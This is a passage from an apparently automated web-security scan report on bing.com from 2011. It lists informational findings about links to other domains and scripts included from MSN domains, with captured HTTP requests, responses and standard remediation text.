<img id="srs_rpt1_ctl03_sritem_ec2_brandLogo" class="ecClickable" onclick="window.open('http\x3A\x2F\x2Fwww.bing.com\x2Flocal\x2Fdetails.aspx\x3Flid\x3DYN165x3154350\x26q\x3DRestaurants\x26tab\x3Dphotos\x26qt\x3Dyp\x26tid\x3Dde23686c9d194a6fb644dc125b68270e\x26FORM\x3DLLSV', '_self');VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3154350', '3', '');" Width="75" align="center" src="http://images.travelnow.com/hotels/1000000/10000/7100/7004/7004_42_t.jpg" style="border-width:0px;" />
<a id="srs_rpt1_ctl03_sritem_ec2_brandAction" class="ecBrandAction" onclick="VE_AnalyticsEngine.LogClick(this.id, document.getElementById(this.id)); ">
...[SNIP]...
</a>

<a id="srs_rpt1_ctl03_sritem_ec2_reservation" class="ecReservation ecClickable printHide" href="http://msn.orbitz.com/App/ViewSpecificHotelLP?masterId=45515&amp;gtkw=45515" onclick="VE_AnalyticsEngine.LogClick(this.id, document.getElementById(this.id)); VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3154350', '3', '');"><img src="/local/i/bookit.gif" id="srs_rpt1_ctl03_sritem_ec2_bookItImage" alt="Book it" />
...[SNIP]...
<div id="srs_rpt1_ctl03_sritem_ec2_actionLinksBottom" class="ecActionLinks">
<a id="srs_rpt1_ctl03_sritem_ec2_ohlWeb" href="http://thechurchillhotel.com/" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3154350', '3', ''); " target="_self">Website</a>
...[SNIP]...
<div id="srs_rpt1_ctl04_sritem_ec2_actionLinksBottom" class="ecActionLinks">
<a id="srs_rpt1_ctl04_sritem_ec2_ohlWeb" href="http://www.benschilibowl.com/ordereze/default.aspx" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3153878', '4', ''); " target="_self">Website</a>
...[SNIP]...
</a>


<a id="srs_rpt1_ctl04_sritem_ec2_ohlBookOnline" class=" ecDotDynamic" href="http://washingtondc.citysearch.com/profile/reservation/2150013/washington_dc/ben_s_chili_bowl.html" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3153878', '4', ''); ">Reservations</a>
...[SNIP]...
<div id="srs_rpt1_ctl05_sritem_ec2_actionLinksBottom" class="ecActionLinks">
<a id="srs_rpt1_ctl05_sritem_ec2_ohlWeb" href="http://www.ebbitt.com/main/home.cfm?Section=Main&amp;Category=About_the_Ebbitt" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3137576', '5', ''); " target="_self">Website</a>
...[SNIP]...
<div id="srs_rpt1_ctl06_sritem_ec2_actionLinksBottom" class="ecActionLinks">
<a id="srs_rpt1_ctl06_sritem_ec2_ohlWeb" href="http://www.citronelledc.com/" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x220138323', '6', ''); " target="_self">Website</a>
...[SNIP]...
</a>

<a id="srs_rpt1_ctl06_sritem_ec2_ohlMenu" class=" ecDotDynamic" href="http://www.citronelledc.com/pdf/menu.pdf" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x220138323', '6', ''); ">Menu</a>
...[SNIP]...
<div id="srs_rpt1_ctl07_sritem_ec2_actionLinksBottom" class="ecActionLinks">
<a id="srs_rpt1_ctl07_sritem_ec2_ohlWeb" href="http://www.limarestaurant.com/" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x219981357', '7', ''); " target="_self">Website</a>
...[SNIP]...
<div id="srs_rpt1_ctl08_sritem_ec2_brandHost" class="ecBrand ecPhotoThumbnailContainer">
<img id="srs_rpt1_ctl08_sritem_ec2_brandLogo" class="ecClickable" onclick="window.open('http\x3A\x2F\x2Fwww.bing.com\x2Flocal\x2Fdetails.aspx\x3Flid\x3DYN165x3134319\x26q\x3DRestaurants\x26tab\x3Dphotos\x26qt\x3Dyp\x26tid\x3Dde23686c9d194a6fb644dc125b68270e\x26FORM\x3DLLSV', '_self');VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3134319', '8', '');" Width="75" align="center" src="http://blufiles.storage.msn.com/y1pAxFO0FPqP-0U3ChD2uMxfKnF6U_17DHSxyLqwMSUUgZW35ZQklkcmjNQIPiPVUvGaBoe4-nAuQ-8PZPDQ7RTAQ" style="border-width:0px;" />
<a id="srs_rpt1_ctl08_sritem_ec2_brandAction" class="ecBrandAction" onclick="VE_AnalyticsEngine.LogClick(this.id, document.getElementById(this.id)); ">
...[SNIP]...
<div id="srs_rpt1_ctl08_sritem_ec2_actionLinksBottom" class="ecActionLinks">
<a id="srs_rpt1_ctl08_sritem_ec2_ohlWeb" href="http://www.cafeatlantico.com/" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3134319', '8', ''); " target="_self">Website</a>
...[SNIP]...
<div id="srs_rpt1_ctl09_sritem_ec2_brandHost" class="ecBrand ecPhotoThumbnailContainer">
<img id="srs_rpt1_ctl09_sritem_ec2_brandLogo" class="ecClickable" onclick="window.open('http\x3A\x2F\x2Fwww.bing.com\x2Flocal\x2Fdetails.aspx\x3Flid\x3DYN165x3178114\x26q\x3DRestaurants\x26tab\x3Dphotos\x26qt\x3Dyp\x26tid\x3Dde23686c9d194a6fb644dc125b68270e\x26FORM\x3DLLSV', '_self');VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3178114', '9', '');" Width="75" align="center" src="http://blufiles.storage.msn.com/y1p6A0u-E5KbWsEcrq7KpvoUMh1jy1pjVYgcA4Nkvq2ybi2boZEjQOy1HhSW02yiJbKoTgPfHXtMH0" style="border-width:0px;" />
<a id="srs_rpt1_ctl09_sritem_ec2_brandAction" class="ecBrandAction" onclick="VE_AnalyticsEngine.LogClick(this.id, document.getElementById(this.id)); ">
...[SNIP]...
<div id="srs_rpt1_ctl09_sritem_ec2_actionLinksBottom" class="ecActionLinks">
<a id="srs_rpt1_ctl09_sritem_ec2_ohlWeb" href="http://www.gwuinn.com/" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3178114', '9', ''); " target="_self">Website</a>
...[SNIP]...
</a>


<a id="srs_rpt1_ctl09_sritem_ec2_ohlBookOnline" class=" ecDotDynamic" href="http://tinyurl.com/ybnhbuy" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3178114', '9', ''); ">Reservations</a>
...[SNIP]...
MDU2OTg=" onclick="VE_AnalyticsEngine.LogClick(this.id, document.getElementById(this.id)); VE_AnalyticsEngine.LogAdClick(this.id, document.getElementById(this.id), '0', 'YellowPages-LSV', 'DWLPACV');"><img id="SecondaryAdResultSetControl_rpt1_ctl00_sritem_ac1_imgImage" class="acClickable" src="http://c66.yellowpages.com/newdisplay_distr/ypc/DC291265.gif" style="border-width:0px;" /></a>
...[SNIP]...
Image" href onclick="VE_AnalyticsEngine.LogClick(this.id, document.getElementById(this.id)); VE_AnalyticsEngine.LogAdClick(this.id, document.getElementById(this.id), '1', 'YellowPages-LSV', 'DLPAV');"><img id="SecondaryAdResultSetControl_rpt1_ctl01_sritem_ac1_imgImage" class="acClickable" src="http://c66.yellowpages.com/newdisplay_distr/ypc/DC272700.gif" style="border-width:0px;" /></a>
...[SNIP]...
<div id="SecondaryAdResultSetControl_adsSponsored" class="adsSponsoredContainer">
<a id="SecondaryAdResultSetControl_adsSponsoredLabel" class="adsSponsoredLink" href="http://listings.yellowpages.com/documents/special_offers/jump-msn.asp?from=maps_localsearch_com" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), '', '', ''); ">Advertise here</a>
...[SNIP]...
<span id="footerLinksControl_businessListingLabel">Add or change your business listing in the <a id="addBusinessLink" href="https://ssl.search.live.com/listings/default.aspx" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), '', '', '');"><span>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,50.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,52.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,54.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,56.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,58.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808582.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,60.1')">Help</a> | </li><li><a href="https://feedback.live.com/default.aspx?productkey=wlsearchlocal&amp;locale=en-us&amp;P1=footerlivelocal&amp;P2=&amp;P3=&amp;P4=LLSV&amp;P5=&amp;P6=washington%2c%20dc%2c%20us&amp;P7=Original&amp;P8=&amp;P9=&amp;P10=&amp;P11=&amp;P13=&amp;searchtype=LiveLocalSearch&amp;backurl=http%3a%2f%2fwww.bing.com%3a80%2flocalsearch%2fdefault.aspx%3fwhere%3dwashington%252c%2bdc%252c%2bus%26cat%3d11168%26q%3dRestaurants%26maxcount%3d4797%26FORM%3dLLSV" id="sb_feedback" onmousedown="return si_T('&amp;ID=FD,62.1')">Tell us what you think</a>
...[SNIP]...

5.8. http://www.bing.com/settings.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /settings.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /settings.aspx?ru=http%3a%2f%2fwww.bing.com%3a80%2flocal%2f&FORM=SEFD1 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 23:28:15 GMT
Connection: close
Content-Length: 19079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&amp;ID=FD,33.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,35.1')">Hotmail</a>
...[SNIP]...
to filter adult content, but it won't catch everything. If you see inappropriate content despite applying your SafeSearch setting, let us know so that we can filter it in the future. Learn more about <a href="http://onlinehelp.microsoft.com/en-US/bing/ff808441.aspx" onmousedown="return si_T('&amp;ID=SERP,109.1')">filtering offensive sites</a> and <a href="http://www.microsoft.com/protect/default.aspx" onmousedown="return si_T('&amp;ID=SERP,110.1')">staying safe online</a>
...[SNIP]...
</strong> Ensure that SafeSearch is always on when your kids search on Bing, choose what they see online, set time limits and game restrictions, and more. Windows users can install the free download, <a href="http://g.live.com/0fsenus4/Client" onmousedown="return si_T('&amp;ID=SERP,111.1')">Windows Live Family Safety</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,45.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,47.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,49.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,51.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,53.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,55.1')">Help</a> | </li><li><a href="https://feedback.live.com/default.aspx?locale=en-US&amp;productkey=wlsearchweb&amp;P1=dsatsettings&amp;P2=&amp;P3=badger&amp;P4=SEFD1&amp;P5=DC63BAA44C3843F38378B4BB213E0A6F&amp;P6=Washington%2c+District+Of+Columbia&amp;P7=Original&amp;P8=&amp;P9=38.9069%2f-77.0284&amp;P10=24902&amp;P11=http%3a%2f%2fwww.bing.com%2flocal%2f&amp;P12=&amp;searchtype=Web+Search&amp;optl1=1&amp;backurl=http%3a%2f%2fwww.bing.com%3a80%2fsettings.aspx%3fru%3dhttp%253a%252f%252fwww.bing.com%253a80%252flocal%252f%26FORM%3dFEEDTU" id="sb_feedback" onclick="si_fb.openCard(this);return false" onfocus="si_fb.loadCard()" onmousedown="return si_T('&amp;ID=FD,57.1')">Tell us what you think</a>
...[SNIP]...

6. Cross-domain script include  previous
There are 9 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


6.1. http://www.bing.com/shopping/classic-womens-fragrances/r/162  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /shopping/classic-womens-fragrances/r/162

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /shopping/classic-womens-fragrances/r/162 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:45:26 GMT
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:45:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:45:27 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=C0C28A6164ED41C38DC21B95216F1854; domain=.bing.com; path=/
Content-Length: 53787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web=
...[SNIP]...
</script><script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...

6.2. http://www.bing.com/travel/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /travel/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /travel/ HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:46:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: lbc=819; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-z4gm3vtmq19cv3yz780quprn4otsl_VID-z1oq4m4dn99d87yz72fovekggbn1v_UID-; Domain=.bing.com; Expires=Sun, 10-Feb-2013 21:46:12 GMT; Path=/travel
Set-Cookie: JSESSIONID=2C453B42A8BD6A784D623C2DF0E8BB7A; Domain=.bing.com; Path=/travel
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:12 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=3F8AAA80A722410C8B09878099EDA1CA; domain=.bing.com; path=/
Content-Length: 87698

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html >
<head><meta content="text/html; charset=utf-8" http-equiv="content-
...[SNIP]...
</script><script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...

6.3. http://www.bing.com/videos/browse  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/browse

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /videos/browse HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=614
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:54:08 GMT
X-AspNet-Version: 2.0.50727
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:43:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:43:53 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=6992B41421FD424494A2E9A2F1D31BD9; domain=.bing.com; path=/
Content-Length: 163651

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
</style><script type="text/javascript" src="http&#58;&#47;&#47;col.stj.s-msn.com&#47;br&#47;sc&#47;js&#47;jquery&#47;jquery-1.4.2.min.js"></script><script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-msn.com&#47;res&#47;1.0.3710.02&#47;js&#47;VideoPre.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-msn.com&#47;res&#47;1.0.3710.02&#47;js&#47;BingPost.js"></script>
...[SNIP]...

6.4. http://www.bing.com/videos/watch/video/10-valentines-presents-you-should-probably-avoid/ufu8tt1z  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/10-valentines-presents-you-should-probably-avoid/ufu8tt1z

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /videos/watch/video/10-valentines-presents-you-should-probably-avoid/ufu8tt1z HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:59:00 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.047 secs
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:44:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:44:00 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=2E275C0252494A33BD7C7B00733A78E2; domain=.bing.com; path=/
Content-Length: 73214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
</style><script type="text/javascript" src="http&#58;&#47;&#47;col.stj.s-msn.com&#47;br&#47;sc&#47;js&#47;jquery&#47;jquery-1.4.2.min.js"></script><script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-msn.com&#47;res&#47;1.0.3710.02&#47;js&#47;VideoPre.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-msn.com&#47;res&#47;1.0.3710.02&#47;js&#47;BingPost.js"></script>
...[SNIP]...

6.5. http://www.bing.com/videos/watch/video/brad-pitt-picks-angelinas-outfits/17wgub818  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/brad-pitt-picks-angelinas-outfits/17wgub818

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /videos/watch/video/brad-pitt-picks-angelinas-outfits/17wgub818 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:58:54 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.047 secs
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:43:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:43:54 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=3E58DCD97AD8436DB0D6F76EA649A7C4; domain=.bing.com; path=/
Content-Length: 68575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
</style><script type="text/javascript" src="http&#58;&#47;&#47;col.stj.s-msn.com&#47;br&#47;sc&#47;js&#47;jquery&#47;jquery-1.4.2.min.js"></script><script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-msn.com&#47;res&#47;1.0.3710.02&#47;js&#47;VideoPre.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-msn.com&#47;res&#47;1.0.3710.02&#47;js&#47;BingPost.js"></script>
...[SNIP]...

6.6. http://www.bing.com/videos/watch/video/fully-fit-the-office-workout/1l0jbr4q7  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/fully-fit-the-office-workout/1l0jbr4q7

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /videos/watch/video/fully-fit-the-office-workout/1l0jbr4q7 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:59:15 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.125 secs
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:44:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:44:15 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=A410FF9BF98B4F51BF7EF5A84D10EA58; domain=.bing.com; path=/
Content-Length: 73861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
</style><script type="text/javascript" src="http&#58;&#47;&#47;col.stj.s-msn.com&#47;br&#47;sc&#47;js&#47;jquery&#47;jquery-1.4.2.min.js"></script><script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-msn.com&#47;res&#47;1.0.3710.02&#47;js&#47;VideoPre.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-msn.com&#47;res&#47;1.0.3710.02&#47;js&#47;BingPost.js"></script>
...[SNIP]...

6.7. http://www.bing.com/videos/watch/video/how-to-cover-up-a-tattoo/1iow3yvpv  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/how-to-cover-up-a-tattoo/1iow3yvpv

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /videos/watch/video/how-to-cover-up-a-tattoo/1iow3yvpv HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=292
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:48:52 GMT
X-AspNet-Version: 2.0.50727
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:43:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:43:59 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=438B0C95E5964EF9BFC5329EA9644004; domain=.bing.com; path=/
Content-Length: 74286

